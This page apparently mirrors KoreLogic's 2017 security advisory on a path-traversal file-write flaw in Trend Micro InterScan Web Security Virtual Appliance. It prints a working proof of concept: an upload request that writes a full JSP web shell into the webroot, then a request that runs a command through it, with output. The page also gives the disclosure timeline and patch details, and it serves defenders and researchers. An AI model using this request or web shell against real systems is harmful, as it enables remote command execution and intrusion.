Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Trendmicro InterScan 6.5-SP2_Build_Linux_1548 Arbitrary File Write

🗓️ 16 Feb 2017 00:00:00Reported by Matthew BerginType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 35 Views

Trendmicro InterScan Arbitrary File Write vulnerability allows remote code execution via HTT

Code
`KL-001-2017-001 : Trendmicro InterScan Arbitrary File Write  
  
Title: Trendmicro InterScan Arbitrary File Write  
Advisory ID: KL-001-2017-001  
Publication Date: 2017.02.15  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-001.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Trendmicro  
Affected Product: InterScan Web Security Virtual Appliance  
Affected Version: OS Version 3.5.1321.el6.x86_64; Application  
Version 6.5-SP2_Build_Linux_1548  
Platform: Embedded Linux  
CWE Classification: CWE-22: Improper Limitation of a Pathname to  
a Restricted Directory ('Path Traversal'),  
CWE-434: Unrestricted Upload of File with  
Dangerous Type  
Impact: Remote Code Execution  
Attack vector: HTTP  
  
2. Vulnerability Description  
  
An authenticated user can create files on the local system.  
This can lead to remote command execution as an authenticated  
user.  
  
3. Technical Description  
  
A servlet takes an arbitrary file path as an output filename,  
and the webserver can create files in the webroot. So, a  
malicious .jsp can be uploaded and then executed through a  
subsequent request to the webserver. Shell courtesy the  
fuzzdb-project  
(https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp).  
  
POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=upload_check  
HTTP/1.1  
Host: 1.3.3.7:8443  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)  
Gecko/20100101 Firefox/49.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Referer: https://1.3.3.7:8443/config_backup_collapsed.jsp  
Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: multipart/form-data;  
boundary=---------------------------135470425518767155135967265  
Content-Length: 1486  
  
-----------------------------135470425518767155135967265  
Content-Disposition: form-data; name="CSRFGuardToken"  
  
4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF  
-----------------------------135470425518767155135967265  
Content-Disposition: form-data; name="op"  
  
save  
-----------------------------135470425518767155135967265  
Content-Disposition: form-data; name="uploadfile";  
filename="../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/korelogic.jsp"  
  
<%@ page import="java.util.*,java.io.*"%>  
<HTML><BODY>  
<FORM METHOD="GET" NAME="myform" ACTION="">  
<INPUT TYPE="text" NAME="cmd">  
<INPUT TYPE="submit" VALUE="Send">  
</FORM>  
<pre>  
<%  
if (request.getParameter("cmd") != null) {  
out.println("Command: " + request.getParameter("cmd") + "<BR>");  
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));  
OutputStream os = p.getOutputStream();  
InputStream in = p.getInputStream();  
DataInputStream dis = new DataInputStream(in);  
String disr = dis.readLine();  
while ( disr != null ) {  
out.println(disr);  
disr = dis.readLine();  
}  
}  
%>  
</pre>  
</BODY></HTML>  
-----------------------------135470425518767155135967265  
Content-Disposition: form-data; name="beFullyOrPartially"  
  
0  
-----------------------------135470425518767155135967265--  
  
HTTP/1.1 302 Found  
Server: Apache-Coyote/1.1  
Location:  
https://1.3.3.7:8443/config_backup_collapsed.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF&errorMessage=6  
Content-Length: 0  
Date: Tue, 25 Oct 2016 14:36:07 GMT  
Connection: close  
  
GET /korelogic.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF&cmd=id  
HTTP/1.1  
Host: 1.3.3.7:8443  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)  
Gecko/20100101 Firefox/49.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Referer: https://1.3.3.7:8443/korelogic.jsp  
Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
Content-Type: text/html  
Content-Length: 320  
Date: Tue, 25 Oct 2016 14:37:58 GMT  
Connection: close  
  
<HTML><BODY>  
<FORM METHOD="GET" NAME="myform" ACTION="">  
<input type="hidden" name="CSRFGuardToken"  
value="4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF">  
<INPUT TYPE="text" NAME="cmd">  
<INPUT TYPE="submit" VALUE="Send">  
</FORM>  
<pre>  
Command: id<BR>  
uid=498(iscan) gid=499(iscan) groups=499(iscan)  
  
</pre>  
</BODY></HTML>  
  
4. Mitigation and Remediation Recommendation  
  
The vendor has issued a patch for this vulnerability in Version  
6.5 CP 1737. Security advisory and link to the patched version  
available at:  
  
https://success.trendmicro.com/solution/1116672  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2016.12.12 - KoreLogic sends vulnerability report and PoC to  
Trendmicro.  
2016.12.15 - Trendmicro acknowledges receipt of report.  
2017.01.11 - Trendmicro informs KoreLogic that the patch to  
this and other KoreLogic reported issues will  
likely be available after the 45 business day  
deadline (2017.02.16).  
2017.02.06 - Trendmicro informs KoreLogic that the patched  
version will be available by 2017.02.14.  
2017.02.14 - Trendmicro security advisory released.  
2017.02.15 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description.  
  
  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Feb 2017 00:00Current
trendmicro interscanarbitrary file writeremote code executionhttpos version 3.5.1321.el6.x86_64embedded linux
35